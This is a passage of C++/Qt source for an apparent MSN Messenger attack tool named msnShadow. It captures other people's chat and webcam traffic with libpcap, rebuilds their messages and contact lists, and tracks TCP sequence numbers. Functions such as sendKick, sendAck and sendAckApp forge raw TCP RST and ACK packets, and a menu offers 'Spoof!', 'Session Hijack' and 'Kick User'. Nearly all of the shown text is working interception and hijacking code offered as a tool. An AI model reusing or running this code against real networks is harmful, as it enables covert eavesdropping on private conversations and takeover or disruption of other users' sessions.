	return;
}
if( (pcap_setfilter(man, &filter)) == -1) {
QMessageBox::critical(this, "PCAP Error", "PCAP ERROR!");
	return;
}

pthread_create(&tid, NULL, startTextSniffGlobal, (void*)man);
startTextButton->setEnabled(false);
stopTextButton->setEnabled(true);

}


void msnShadow::startVideoSniff() {

if((getuid())){
	QMessageBox::information(this, "Root?", "You must be ROOT!");
	return;
}

pthread_t tid;

codec = mimic_open();

char *dev, errbuf[PCAP_ERRBUF_SIZE];
pcap_t *man;
char bosta[200];
struct bpf_program filter;
QString filter_app = "";
if(!configPtr->checkAuto->isChecked())
	filter_app = configPtr->videoString;
else
	filter_app = "";

unsigned char packet[65535];
bpf_u_int32 mask;
bpf_u_int32 net;


if( (configPtr->videoBox->text(configPtr->videoBox->currentItem()).isEmpty()) ) {
	QMessageBox::critical(this, "Interface Error", "Choose a interface");
	return;
}
dev = (char*)configPtr->videoBox->text(configPtr->videoBox->currentItem()).ascii();
if ( (pcap_lookupnet(dev, &net, &mask, errbuf)) == -1){
QMessageBox::critical(this, "PCAP Error", "PCAP ERROR!");
	return;
}
man = pcap_open_live(dev, BUFSIZ, 1, 0, errbuf);
if( man == NULL) {
QMessageBox::critical(this, "PCAP Error", "PCAP ERROR!");
	return;
}
if ((pcap_compile(man, &filter, (char*)filter_app.ascii(), 0, net)) == -1){
QMessageBox::critical(this, "PCAP Error", "Filter Error");
	return;
}
if( (pcap_setfilter(man, &filter)) == -1){
QMessageBox::critical(this, "PCAP Error", "PCAP ERROR!");
	return;
}
startVideoButton->setEnabled(false);
stopVideoButton->setEnabled(true);
isSniffingVideo = 1;
pthread_create(&tid, NULL, startVideoSniffGlobal, (void*)man);
}

void *startVideoSniffGlobal(void *args) {

pcap_loop((pcap_t*)args, -1, callfuncVideo, NULL);


}


void msnShadow::handleBufferVideo(QByteArray byteZ) {

struct ether_header *ethernet;
struct ip *ip;
struct tcphdr *tcp;
struct udphdr *udp;
const char *packet = byteZ.data();
int size_ethernet = sizeof(struct ether_header);
int size_ip       = sizeof(struct ip);
int size_tcp      = sizeof(struct tcphdr);
int size_udp      = sizeof(struct udphdr);
int length;
int *ignoreBytes = NULL;
int *indexD;
int findByte;
char *decoderBuff;
QLabel *labelzao;

ethernet = (struct ether_header*)(packet);

if(configPtr->ignoreVideo) {

	QString mac = QString(ether_ntoa((ether_addr*)ethernet->ether_shost));
	
	mac = mac.upper();
	
	
	if( (mac.find(configPtr->currentVideo->mac)) != -1){
	
		return;
}
    
}

ip       = (struct ip*)(packet + size_ethernet);
tcp   = (struct tcphdr*)(packet + size_ethernet + size_ip);
char *pcap_payloads = (char *)(packet + size_ethernet + ((ip->ip_hl)*4) + (((int)tcp->th_off)*4));
int lengthPackets = ntohs(ip->ip_len) - (((int)tcp->th_off)*4) - ((ip->ip_hl)*4);

QString ip_src = QString(inet_ntoa(ip->ip_src));
QString ip_dst = QString(inet_ntoa(ip->ip_dst));

std::list<msnShadowItemVideo*>::iterator it = listVideo.begin();
        
	msnShadowItemVideo *point = NULL;
        while(it != listVideo.end()){
            if((*it)->ip_src == ip_src && (*it)->ip_dst == ip_dst){
                point = (*it);
               
                break;
            }
            it++;
        }
        srand(time(NULL));
        
        if(!point){
		point = createVideo(ip_src, ip_dst);
		
}
	else{
		
	
            point->receiveBuffer(pcap_payloads, lengthPackets, rand());
	    if(point->videoPackets < 20)
	    	point->videoPackets++;
	    else
		if(!point->isVideoConn){ //if this connection is not a video connection
			listVideo.remove(point); // must be deleted
  			delete point;
}
	    if(point->isVideoConn)
		point->setVisible(true);
}
	
           
             
                return;


}



void callfuncVideo(u_char *args, const struct pcap_pkthdr *header, const u_char *packet) {
	
	if(!ptrWindow->isSniffingVideo && !ptrWindow->isSniffingVideoPcap)
		pthread_exit(0);
	
	int tam = header->caplen;
	QByteArray byteZ(tam);
	for(int i = 0; i < tam; i++)
		byteZ[i] = packet[i];
	
	handleBufferVideoEvent *ev = new handleBufferVideoEvent(byteZ);
	
	QApplication::postEvent(ptrWindow, (QCustomEvent*)ev);
	if(ptrWindow->isSniffingVideoPcap){
	usleep(15000);
}
	fflush(stdout);
	return;


}

void msnShadow::customEvent(QCustomEvent *e) {
    
     if(e->type() == 1010) {
	
	handleBufferEvent *ev = (handleBufferEvent*)e;
	handleBuffer(ev->packet, ev->packetTime);
	return;
}
    
    
	else if(e->type() == 1111) {
	
	handleBufferVideoEvent *ev = (handleBufferVideoEvent*)e;
	handleBufferVideo(ev->packet);
	
	return;
	
}
    
    
   
}

int msnShadow::searchBytes(const char* buffer, int length) {
    
    
    for(int i = 0; i < length;i++) {
        if(buffer[i] == 0x18)
            if(buffer[i+1] == 0x00)
                if(buffer[i+2] == 0x40)
                    if(buffer[i+3] == 0x01)
                        if(buffer[i+5] == 0x00){
                     
                         return i;
                }
                            
                           
                           
    }
    
    return -1;
    
    
}

void *startTextSniffGlobal(void *args) {

pcap_loop((pcap_t*)args, -1, callfunc, NULL);

}


void msnShadow::handleBuffer(QByteArray packetzao, QString packetTime) {
struct ether_header *ethernet;
struct ip *ip;
struct tcphdr *tcp;
const char *packet = packetzao.data();
int i = 0, k = 0;
int s1, s2;
char ascii[2048], nick[200], teste[200];
char *asc;
u_char *pay;
int tam;
int size_ethernet = sizeof(struct ether_header);
int size_ip       = sizeof(struct ip);
int size_tcp      = sizeof(struct tcphdr);
int size_udp      = sizeof(struct udphdr);
char *payload, buffer[100], type[100], msg[200];
u_char *peiloud;
ethernet = (struct ether_header*)(packet);

if((configPtr->ignoreText)) {

	QString mac = QString(ether_ntoa((ether_addr*)ethernet->ether_shost));
	
	mac = mac.upper();
	
	
	if( (mac.find(configPtr->currentText->mac)) != -1){
	
		return;
}
    
}
ip       = (struct ip*)(packet + size_ethernet);

tcp   = (struct tcphdr*)(packet + size_ethernet + size_ip);
payload = (char*)(packet +sizeof(struct ether_header) + sizeof(struct tcphdr) + sizeof(struct ip));

bool hasOptions = false;
if(payload[0] == 0x1 && payload[1] == 0x1) {
	payload += 12;
	hasOptions = true;
}


QString ip_src(inet_ntoa(ip->ip_src));
QString ip_dst(inet_ntoa(ip->ip_dst));

std::list<msnShadowItemChat*>::iterator itSpoof = listChatS.begin();
while(itSpoof != listChatS.end()) {
if( (((*itSpoof)->ip1 == ip_src) && ((*itSpoof)->ip2 == ip_dst)) || (((*itSpoof)->ip2 == ip_src) && ((*itSpoof)->ip1 == ip_dst))   ) //ja existe

{
if( ip_src == (*itSpoof)->ip1 ) {


(*itSpoof)->seq1 = ntohl(tcp->th_seq) + (ntohs(ip->ip_len)) - (((int)(tcp->th_off))*4) - (ip->ip_hl * 4);
(*itSpoof)->ack1 = ntohl(tcp->th_ack);
break;
}
else
{

(*itSpoof)->seq2 = ntohl(tcp->th_seq) + (ntohs(ip->ip_len)) - (((int)(tcp->th_off))*4) - (ip->ip_hl * 4);
(*itSpoof)->ack2 = ntohl(tcp->th_ack);
break;
}


}
itSpoof++;
}


tam = (ntohs(ip->ip_len) - sizeof(struct ip) - sizeof(struct tcphdr));

if(hasOptions)
	tam -= 12;

if(!tam) {

	bool isKick;
	if( itSpoof != listChatS.end()) {
	if( (*itSpoof)->ip1 == ip_dst)
		isKick = (*itSpoof)->isKick1;
	else
		isKick = (*itSpoof)->isKick2;
	if((tcp->th_flags == (TH_FIN | TH_ACK)) && isKick){
		sendAck(ip_dst, ip_src, ntohl(tcp->th_seq), ntohl(tcp->th_ack), ntohs(tcp->th_dport), ntohs(tcp->th_sport), 0);
}
}

}

asc = ascii;
memset(ascii, 0x00, sizeof(ascii));
pay = (u_char*)payload;

while(--tam >= 0 && k++ < 2040){
s1 = *pay++;
if(s1 == '\r'){
*asc++ = '\r';
continue;
}
if(s1 == '\n'){
*asc++ = '\n';
continue;
}


*(asc++) = (isgraph(s1) ? s1 : ' ');
}
*asc++ = '\0';

QString msnMessage(ascii);




QString nickReceived, msgReceived;
int numberMsg;
std::list<msnShadowContactList*>::iterator contact;
if(msnMessage.find("GTC") != -1) {

msnShadowContactList *newIPContact = new msnShadowContactList(ip_src, ip_dst);
newIPContact->flag = true;
newIPContact->type = "GTC";
newIPContact->contacts.append(msnMessage);
listContact.push_back(newIPContact);

}
else {
contact = listContact.begin();
while(contact != listContact.end()) {
	if(((*contact)->client == ip_dst) && (*contact)->server == ip_src && (*contact)->flag == true && (*contact)->type == "GTC"){
		//qDebug("entrou no else\n");
		//qDebug("ELSE --> %s\n", msnMessage.ascii());
		
		(*contact)->contacts.append(msnMessage);
		
		
		if(msnMessage.find("GCF") != -1 || msnMessage.find("CHG") != -1) {
			
			//qDebug("achou ml$$$$$$$$$$$$$$$$$$$");
			(*contact)->flag = false;
			(*contact)->makeContactList2();
			//qDebug("###### %s #######\n", (*contact)->contacts.join("").ascii());
		
			
			
}
	
}
contact++;
}


}


if( (msnMessage.find("ADL") != -1)) {
contact = listContact.begin();
while(contact != listContact.end()){
	if( ((*contact)->client == ip_src && (*contact)->server == ip_dst ) || ((*contact)->client == ip_dst && (*contact)->server == ip_src) ) {
		
		return;
}
contact++;
}

msnShadowContactList *newIPContact = new msnShadowContactList(ip_dst, ip_src);
newIPContact->type = "ADL";
if(msnMessage.find("</ml>") != -1){

newIPContact->flag = false;
//newIPContact->contacts.append(msnMessage.mid(msnMessage.find("<ml"), msnMessage.length() - msnMessage.find("</ml>") + 4));
newIPContact->contacts.append(msnMessage.mid(msnMessage.find("<ml"), msnMessage.find("</ml") - msnMessage.find("<ml") + 5));
newIPContact->makeContactList();
//qDebug("terminou same\n%s\n", msnMessage.mid(msnMessage.find("<ml"), msnMessage.length() - msnMessage.find("</ml>") + 4).ascii());

}
else {
newIPContact->contacts.append(msnMessage);
newIPContact->flag = true;
}
listContact.push_back(newIPContact);

//qDebug("%s\n", msnMessage.ascii());
}
else{
contact = listContact.begin();
while(contact != listContact.end()) {
	if(((*contact)->client == ip_src) && (*contact)->server == ip_dst && (*contact)->flag == true && (*contact)->type == "ADL"){
		//qDebug("entrou no else\n");
		//qDebug("ELSE --> %s\n", msnMessage.ascii());
		(*contact)->contacts.append(msnMessage);
		
		
		if(msnMessage.find("</ml>") != -1) {
			//qDebug("achou ml$$$$$$$$$$$$$$$$$$$");
			(*contact)->flag = false;
			(*contact)->makeContactList();
			//qDebug("###### %s #######\n", (*contact)->contacts.join("").ascii());
		
			
			
}
	
}
contact++;
}

}

if( ((msnMessage.find("msmsgscontrol")) != -1) || ((msnMessage.find("text/plain")) != -1) ) {
if ( (msnMessage.find("msmsgscontrol")) != -1) {
nickReceived = msnMessage.mid(msnMessage.find("TypingUser:")+12, msnMessage.findRev("\r\n" ) - (msnMessage.find("TypingUser:") + 11));
if(nickReceived.isNull() || nickReceived == msnMessage)
	return;
if(itSpoof != listChatS.end()) {
	if((*itSpoof)->ip1 == ip_dst) {
		if((*itSpoof)->isHijack1){
			sendAck(ip_dst, ip_src, ntohl(tcp->th_ack), ntohl(tcp->th_seq) + msnMessage.length(), ntohs(tcp->th_dport), ntohs(tcp->th_sport), 0);
}
}
	else {
		if((*itSpoof)->isHijack2)
			sendAck(ip_dst, ip_src, ntohl(tcp->th_ack), ntohl(tcp->th_seq) + msnMessage.length(), ntohs(tcp->th_dport), ntohs(tcp->th_sport), 0);
}
}
}
else {
msgReceived = msnMessage.mid(msnMessage.findRev("\r\n") + 2, msnMessage.length() - msnMessage.findRev("\r\n") + 2);
if(msgReceived.isNull() || msgReceived == msnMessage)
	return;

QChar chaar = msnMessage.at(4);
QString handlerNumber = msnMessage.mid(0, msnMessage.find("\r\n") + 2);
if(chaar.isDigit()) {

numberMsg = (handlerNumber.mid(4, handlerNumber.find("A") - (4) - 1)).toInt();
if(itSpoof != listChatS.end()) {
	if((*itSpoof)->ip1 == ip_dst){
		if((*itSpoof)->isHijack1) {
			hijackDlg *hijacker = (hijackDlg*)(*itSpoof)->hijack1;
			hijacker->sendAckApp(ntohl(tcp->th_ack), ntohl(tcp->th_seq) + msnMessage.length(), numberMsg);
}
}
	else {
		if((*itSpoof)->isHijack2) {
			hijackDlg *hijacker = (hijackDlg*)(*itSpoof)->hijack2;
			hijacker->sendAckApp(ntohl(tcp->th_ack), ntohl(tcp->th_seq) + msnMessage.length(), numberMsg);
}
		


}
}

}
else {

numberMsg = handlerNumber.mid((handlerNumber.findRev(" ") + 1), (handlerNumber.find("\r\n") - handlerNumber.findRev(" ") - 1)).toInt();
}




}

if( itSpoof != listChatS.end() )
{

if((msnMessage.find("msmsgscontrol")) != -1) {
if((*itSpoof)->ip1 == ip_src) {
(*itSpoof)->nick1 = nickReceived;
(*itSpoof)->port1 = ntohs(tcp->th_sport);
(*itSpoof)->port2 = ntohs(tcp->th_dport);

return;
}
else{
(*itSpoof)->nick2 = nickReceived;
(*itSpoof)->port1 = ntohs(tcp->th_dport);
(*itSpoof)->port2 = ntohs(tcp->th_sport);
return;
}
}
else {


if( (*itSpoof)->ip1 == ip_src) {
msnShadowItemMsg *msg = new msnShadowItemMsg((*itSpoof)->listView, ip_src, ip_dst, (*itSpoof)->nick1, (*itSpoof)->nick2, msgReceived, (*itSpoof)->listView->lastItem(), (*itSpoof), packetTime);

(*itSpoof)->numberMsg1 = numberMsg + 1;
QString msgNick = isLan(msnMessage);

if(!msgNick.isNull()){
	(*itSpoof)->isLan1 = false;
	(*itSpoof)->isLanString1 = msgNick;
	int space1 = msnMessage.find(' ');
int space2 = msnMessage.find(' ', space1 + 1);

	(*itSpoof)->isLanEmail1 = msnMessage.mid(space1 + 1, space2 - space1 - 1);
	
}
if((*itSpoof)->isHijack2) {
hijackDlg *hijack = (hijackDlg*)(*itSpoof)->hijack2;
if(hijack){
	hijack->addMessage((*itSpoof)->nick1, msgReceived);
	if(!msgNick.isNull())
	hijack->sendAck(ntohl(tcp->th_ack), ntohl(tcp->th_seq)+msnMessage.length());
}
}



}

else {

msnShadowItemMsg *msg = new msnShadowItemMsg((*itSpoof)->listView, ip_src, ip_dst, (*itSpoof)->nick2, (*itSpoof)->nick1, msgReceived, (*itSpoof)->listView->lastItem(), (*itSpoof), packetTime);

(*itSpoof)->numberMsg2 = numberMsg + 1;
QString msgNick = isLan(msnMessage);
if(!msgNick.isNull()){

	(*itSpoof)->isLan2 = false;
	(*itSpoof)->isLanString2 = msgNick;
	int space1 = msnMessage.find(' ');
int space2 = msnMessage.find(' ', space1 + 1);
(*itSpoof)->isLanEmail2 = msnMessage.mid(space1 + 1, space2 - space1 - 1);
	
}



if((*itSpoof)->isHijack1) {
hijackDlg *hijack = (hijackDlg*)(*itSpoof)->hijack1;
if(hijack){
	hijack->addMessage((*itSpoof)->nick2, msgReceived);
	if(!msgNick.isNull())
	hijack->sendAck(ntohl(tcp->th_ack), ntohl(tcp->th_seq)+msnMessage.length());
}
}

}

return;
}


}

if( ((msnMessage.find("text/plain")) != -1)){
createChat(ip_src,ip_dst, msgReceived, 0, ntohs(tcp->th_sport), ntohs(tcp->th_dport));

}

else{

createChat(ip_src, ip_dst, nickReceived, 1, ntohs(tcp->th_sport), ntohs(tcp->th_dport));
}


}

else if(msnMessage.find("ACK") != -1) {
	
	if(itSpoof != listChatS.end()){
		if((*itSpoof)->ip1 == ip_src) {
			if( (*itSpoof)->isHijack2){
		hijackDlg *hijack = (hijackDlg*)(*itSpoof)->hijack2;
if(hijack){
	hijack->sendAck(ntohl(tcp->th_ack), ntohl(tcp->th_seq)+msnMessage.length());
}
}
}
		else {
			if( (*itSpoof)->isHijack1) {
		hijackDlg *hijack = (hijackDlg*)(*itSpoof)->hijack1;
if(hijack){
	hijack->sendAck(ntohl(tcp->th_ack), ntohl(tcp->th_seq)+msnMessage.length());
}
}
			
}
		
}
	
}

else if((msnMessage.find("PNG") != -1)) {
	
	
	std::list<msnShadowItemChat*>::iterator server = listChatS.begin();
	while(server != listChatS.end() ) {
		if((*server)->ip1 == ip_src){
			
			
			if(hasOptions)
				(*server)->seqServer1 = ntohl(tcp->th_seq) + (ntohs(ip->ip_len) - 52);
			else
				(*server)->seqServer1 = ntohl(tcp->th_seq) + (ntohs(ip->ip_len) - 40);
			(*server)->ackServer1 = ntohl(tcp->th_ack);
			(*server)->serverIp1 = ip_dst;
			(*server)->kickType = 0;
			(*server)->serverPort1 = ntohs(tcp->th_dport);
			(*server)->clientPort1 = ntohs(tcp->th_sport);
			break;
			
}
		
		else {
			if((*server)->ip2 == ip_src) {
			
			if(hasOptions)
				(*server)->seqServer2 = ntohl(tcp->th_seq) + (ntohs(ip->ip_len) - 52);
			else
				(*server)->seqServer2 = ntohl(tcp->th_seq) + (ntohs(ip->ip_len) - 40);
			(*server)->ackServer2 = ntohl(tcp->th_ack);
			(*server)->serverIp2 = ip_dst;
			(*server)->kickType = 0;
			(*server)->serverPort2 = ntohs(tcp->th_dport);
			(*server)->clientPort2 = ntohs(tcp->th_sport);
			break;
}
			
}
server++;
}

}

else if((msnMessage.find("QNG") != -1) || (msnMessage.find("UBX") != -1) || (msnMessage.find("NLN") != -1) || (msnMessage.find("XFR") != -1)) {
	
	
	std::list<msnShadowItemChat*>::iterator server = listChatS.begin();
	while(server != listChatS.end() ) {
		if((*server)->ip1 == ip_dst){
			
			
			if(hasOptions)
				(*server)->seqServer1 = ntohl(tcp->th_seq) + (ntohs(ip->ip_len) - 52);
			else
				(*server)->seqServer1 = ntohl(tcp->th_seq) + (ntohs(ip->ip_len) - 40);
			(*server)->ackServer1 = ntohl(tcp->th_ack);
			(*server)->serverIp1 = ip_src;
			(*server)->kickType = 1;
			(*server)->serverPort1 = ntohs(tcp->th_sport);
			(*server)->clientPort1 = ntohs(tcp->th_dport);
			break;
			
}
		
		else {
			if((*server)->ip2 == ip_dst) {
			
			if(hasOptions)
				(*server)->seqServer2 = ntohl(tcp->th_seq) + (ntohs(ip->ip_len) - 52);
			else
				(*server)->seqServer2 = ntohl(tcp->th_seq) + (ntohs(ip->ip_len) - 40);
			(*server)->ackServer2 = ntohl(tcp->th_ack);
			(*server)->serverIp2 = ip_src;
			(*server)->kickType = 1;
			(*server)->serverPort2 = ntohs(tcp->th_sport);
			(*server)->clientPort2 = ntohs(tcp->th_dport);
			break;
}
			
}
server++;
}

}


}

QString msnShadow::isLan(QString str) {
QString stringg = str.mid(str.find(' ') + 1, (str.find(' ', (str.find(' ')) + 1)) - str.find(' ') - 1);
for(int i = 0; i < stringg.length(); i++) {
	QChar ch(stringg.at(i));
	if(!ch.isDigit()){
	int space1 = str.find(' ');
	int space2 = str.find(' ', space1 + 1);
	int space3 = str.find(' ' , space2 + 1);
	return str.mid(space2 + 1, space3 - space2 - 1);
		
		
}
}
return QString::null;
}

void callfunc(u_char *args, const struct pcap_pkthdr *header, const u_char *packet) {
	if(!ptrWindow->isSniffing)
		pthread_exit(0);
struct ip *ip;
ip       = (struct ip*)(packet + sizeof(struct ether_header));



QString ip_src(inet_ntoa(ip->ip_src));
QString ip_dst(inet_ntoa(ip->ip_dst));
        time_t tempo_pacote = header->ts.tv_sec;
	localtime(&tempo_pacote);
	QString packetTime((const char*)ctime(&tempo_pacote));
	
	
	int tam = header->caplen;
	QByteArray byteZ(tam);
	for(int i = 0; i<tam;i++)
		byteZ[i] = packet[i];
	
	handleBufferEvent *ev = new handleBufferEvent(byteZ, packetTime);
	
	QApplication::postEvent(ptrWindow, (QCustomEvent*)ev);


}
/*
 *  Sets the strings of the subwidgets using the current
 *  language.
 */

void msnShadow::contextMenuSpoof(QListViewItem *i, const QPoint &pos, int col) {
QPopupMenu menu(this);
if(!i)
	return;
spooferItem = (msnShadowItemMsg*)i;
menu.insertItem("Spoof!", this, SLOT(spoofer()));
menu.insertItem("Session Hijack", this, SLOT(hijack()));
menu.insertItem("Kick User", this , SLOT(kickUser()));

menu.exec(pos);
}



void msnShadow::kickUser() {
	int host = QMessageBox::question(this, "Choose a host to kick", "What host do you want to kick?", spooferItem->chat->ip1, spooferItem->chat->ip2, "Cancel", 2, 2);
	if(host == 2)
		return;
	if(!host) {
		if(spooferItem->chat->serverIp1 == QString::null){
			QMessageBox::critical(this, "Error", "Impossible kick this user");
			return;
}
		spooferItem->chat->isKick1 = true;
		if(!spooferItem->chat->kickType)
			sendKick(spooferItem->chat->ip1, spooferItem->chat->serverIp1, spooferItem->chat->seqServer1, spooferItem->chat->ackServer1, spooferItem->chat->clientPort1, spooferItem->chat->serverPort1);
		else
			sendKick(spooferItem->chat->serverIp1, spooferItem->chat->ip1, spooferItem->chat->seqServer1, spooferItem->chat->ackServer1, spooferItem->chat->serverPort1, spooferItem->chat->clientPort1);
}
	else{
		if(spooferItem->chat->serverIp2 == QString::null){
			QMessageBox::critical(this, "Error", "Impossible kick this user");
			return;
}
		spooferItem->chat->isKick2 = true;
		if(!spooferItem->chat->kickType)
			sendKick(spooferItem->chat->ip2, spooferItem->chat->serverIp2, spooferItem->chat->seqServer2, spooferItem->chat->ackServer2, spooferItem->chat->clientPort2, spooferItem->chat->serverPort2);
		else
			sendKick(spooferItem->chat->serverIp2, spooferItem->chat->ip2, spooferItem->chat->seqServer2, spooferItem->chat->ackServer2, spooferItem->chat->serverPort2, spooferItem->chat->clientPort2);
}

}

unsigned short msnShadow::in_cksum(unsigned short *addr, int len) {
	register int sum = 0;
	u_short answer = 0;
	register u_short *w = addr;
	register int nleft = len;

	while(nleft > 1) {
		sum += *w++;
		nleft -= 2;
	}

	if(nleft == 1) {
		*(u_char *)(&answer) = *(u_char *)w;
		sum += answer;
	}

	sum = (sum >> 16) + (sum & 0xffff);
	sum += (sum >> 16);
	answer = ~sum;
	return answer;
}

void msnShadow::sendKick(QString ip_src, QString ip_dst, unsigned int seq, unsigned int ack, unsigned short clientPort, unsigned short serverPort) {

	struct pseudo_header {
	unsigned long s_addr;
	unsigned long d_addr;
	char zero;
	unsigned char protocol;
	unsigned short length;
};

QString OUT = "OUT\r\n";



int packet_size = (sizeof(struct tcphdr) + sizeof(struct ip) + OUT.length());
char *packet = (char*)malloc(packet_size);
        struct ip *ip_out = (struct ip*) packet;
	
        struct pseudo_header *pseudo_out = (struct pseudo_header *)(packet + sizeof(struct ip) - sizeof(struct pseudo_header));
	
        struct tcphdr *tcp_out = (struct tcphdr *)(packet + sizeof(struct ip));
	memcpy((packet+sizeof(struct ip) + sizeof(struct tcphdr)), OUT.ascii(), OUT.length());
	memset(packet, 0x00, (sizeof(struct ip) + sizeof(struct tcphdr)));
	struct in_addr saddr, daddr;
	
 saddr.s_addr = inet_addr(ip_src.ascii());
 daddr.s_addr = inet_addr(ip_dst.ascii());
pseudo_out->s_addr = inet_addr(ip_src.ascii());
 pseudo_out->d_addr = inet_addr(ip_dst.ascii());

pseudo_out->length = htons(sizeof(struct tcphdr) + OUT.length());

	pseudo_out->protocol = IPPROTO_TCP;
int sock;
	if( (sock = socket (AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0){
		perror("Socket");
		return;
	}

	int on = 1;

	if ( (setsockopt(sock, IPPROTO_IP, IP_HDRINCL, (char *)&on, sizeof(on))) < 0 ){
		perror("Setsockopt");
		return;
	}
	memset((char *)tcp_out, 0x00, sizeof(struct tcphdr));
	tcp_out->th_sport = htons(clientPort);
 tcp_out->th_dport = htons(serverPort);
 tcp_out->th_seq = htonl(seq);
 tcp_out->th_ack = htonl(ack);
tcp_out->th_off = 5;
 tcp_out->th_flags = TH_RST;//TH_ACK;
 tcp_out->th_win = htons(12000);
 tcp_out->th_sum = 0;
 tcp_out->th_sum = in_cksum((unsigned short *)pseudo_out, sizeof(struct tcphdr) + sizeof(struct pseudo_header) + OUT.length());

	
 memset(packet, 0x00, sizeof(struct ip));
ip_out->ip_v = 4;
 ip_out->ip_hl = 5;
 ip_out->ip_len = packet_size;
 ip_out->ip_off = 0;
 ip_out->ip_ttl = 255;
 ip_out->ip_p = IPPROTO_TCP;
 ip_out->ip_src = saddr;
 ip_out->ip_dst = daddr;

 ip_out->ip_sum = in_cksum((unsigned short*)ip_out, sizeof(struct ip));
	
	struct sockaddr_in raw;
	raw.sin_family = AF_INET;
	raw.sin_port = htons(serverPort);
	raw.sin_addr.s_addr = inet_addr(ip_dst);
	sendto(sock, packet, packet_size, 0x00, (struct sockaddr *)&raw, sizeof(raw));
	sendAck(ip_src, ip_dst, seq + OUT.length(), ack, clientPort, serverPort, 1);

}


void msnShadow::sendAck(QString ip_src, QString ip_dst, unsigned int seq, unsigned int ack, unsigned short clientPort, unsigned short serverPort, int id) {

	struct pseudo_header {
	unsigned long s_addr;
	unsigned long d_addr;
	char zero;
	unsigned char protocol;
	unsigned short length;
};




int packet_size = (sizeof(struct tcphdr) + sizeof(struct ip));
char *packet = (char*)malloc(packet_size);
        struct ip *ip_out = (struct ip*) packet;
	
        struct pseudo_header *pseudo_out = (struct pseudo_header *)(packet + sizeof(struct ip) - sizeof(struct pseudo_header));
	
        struct tcphdr *tcp_out = (struct tcphdr *)(packet + sizeof(struct ip));
	
	memset(packet, 0x00, (sizeof(struct ip) + sizeof(struct tcphdr)));
	struct in_addr saddr, daddr;
	
 saddr.s_addr = inet_addr(ip_src.ascii());
 daddr.s_addr = inet_addr(ip_dst.ascii());
pseudo_out->s_addr = inet_addr(ip_src.ascii());
 pseudo_out->d_addr = inet_addr(ip_dst.ascii());

pseudo_out->length = htons(sizeof(struct tcphdr));
	pseudo_out->protocol = IPPROTO_TCP;
int sock;
	if( (sock = socket (AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0){
		perror("Socket");
		return;
	}

	int on = 1;

	if ( (setsockopt(sock, IPPROTO_IP, IP_HDRINCL, (char *)&on, sizeof(on))) < 0 ){
		perror("Setsockopt");
		return;
	}
	memset((char *)tcp_out, 0x00, sizeof(struct tcphdr));
	tcp_out->th_sport = htons(clientPort);
 tcp_out->th_dport = htons(serverPort);
 tcp_out->th_seq = htonl(seq);
 tcp_out->th_ack = htonl(ack);
tcp_out->th_off = 5;
	if(!id)
 tcp_out->th_flags = TH_ACK;
	else
tcp_out->th_flags = TH_FIN | TH_ACK;
 tcp_out->th_win = htons(12000);
 tcp_out->th_sum = 0;
 tcp_out->th_sum = in_cksum((unsigned short *)pseudo_out, sizeof(struct tcphdr) + sizeof(struct pseudo_header));

	
 memset(packet, 0x00, sizeof(struct ip));
ip_out->ip_v = 4;
 ip_out->ip_hl = 5;
 ip_out->ip_len = packet_size;
 ip_out->ip_off = 0;
 ip_out->ip_ttl = 255;
 ip_out->ip_p = IPPROTO_TCP;
 ip_out->ip_src = saddr;
 ip_out->ip_dst = daddr;

 ip_out->ip_sum = in_cksum((unsigned short*)ip_out, sizeof(struct ip));
	
	struct sockaddr_in raw;
	raw.sin_family = AF_INET;
	raw.sin_port = htons(serverPort);
	raw.sin_addr.s_addr = inet_addr(ip_dst);
	sendto(sock, packet, packet_size, 0x00, (struct sockaddr *)&raw, sizeof(raw));

	

}

void msnShadow::sendAckApp(QString ip_src, QString ip_dst, unsigned int seq, unsigned int ack, unsigned short clientPort, unsigned short serverPort, int numberMsg) {

	struct pseudo_header {
	unsigned long s_addr;
	unsigned long d_addr;
	char zero;
	unsigned char protocol;
	unsigned short length;
};


QString ACK = QString("ACK %1\r\n").arg(numberMsg);

int packet_size = (sizeof(struct tcphdr) + sizeof(struct ip) + ACK.length());
char *packet = (char*)malloc(packet_size);
        struct ip *ip_out = (struct ip*) packet;
	
        struct pseudo_header *pseudo_out = (struct pseudo_header *)(packet + sizeof(struct ip) - sizeof(struct pseudo_header));
	
        struct tcphdr *tcp_out = (struct tcphdr *)(packet + sizeof(struct ip));
	memcpy((packet+sizeof(struct ip) + sizeof(struct tcphdr)), ACK.ascii(), ACK.length());
	memset(packet, 0x00, (sizeof(struct ip) + sizeof(struct tcphdr)));
	struct in_addr saddr, daddr;
	
 saddr.s_addr = inet_addr(ip_src.ascii());
 daddr.s_addr = inet_addr(ip_dst.ascii());
pseudo_out->s_addr = inet_addr(ip_src.ascii());
 pseudo_out->d_addr = inet_addr(ip_dst.ascii());

pseudo_out->length = htons(sizeof(struct tcphdr) + ACK.length());
	pseudo_out->protocol = IPPROTO_TCP;
int sock;
	if( (sock = socket (AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0){
		perror("Socket");
		return;
	}

	int on = 1;

	if ( (setsockopt(sock, IPPROTO_IP, IP_HDRINCL, (char *)&on, sizeof(on))) < 0 ){
		perror("Setsockopt");
		return;
	}
	memset((char *)tcp_out, 0x00, sizeof(struct tcphdr));
	tcp_out->th_sport = htons(clientPort);
 tcp_out->th_dport = htons(serverPort);
 tcp_out->th_seq = htonl(seq);
 tcp_out->th_ack = htonl(ack);
tcp_out->th_off = 5;
tcp_out->th_flags = TH_PUSH | TH_ACK;
 tcp_out->th_win = htons(12000);
 tcp_out->th_sum = 0;
 tcp_out->th_sum = in_cksum((unsigned short *)pseudo_out, sizeof(struct tcphdr) + sizeof(struct pseudo_header) + ACK.length());

	
 memset(packet, 0x00, sizeof(struct ip));
ip_out->ip_v = 4;
 ip_out->ip_hl = 5;
 ip_out->ip_len = packet_size;
 ip_out->ip_off = 0;
 ip_out->ip_ttl = 255;
 ip_out->ip_p = IPPROTO_TCP;
 ip_out->ip_src = saddr;
 ip_out->ip_dst = daddr;

 ip_out->ip_sum = in_cksum((unsigned short*)ip_out, sizeof(struct ip));
	
	struct sockaddr_in raw;
	raw.sin_family = AF_INET;
	raw.sin_port = htons(serverPort);
	raw.sin_addr.s_addr = inet_addr(ip_dst);
	sendto(sock, packet, packet_size, 0x00, (struct sockaddr *)&raw, sizeof(raw));

	

}


void msnShadow::hijack() {
	QString str1 = QString("%1(%2)").arg(spooferItem->chat->nick1).arg(spooferItem->chat->ip1);
	
	QString str2 = QString("%1(%2)").arg(spooferItem->chat->nick2).arg(spooferItem->chat->ip2);

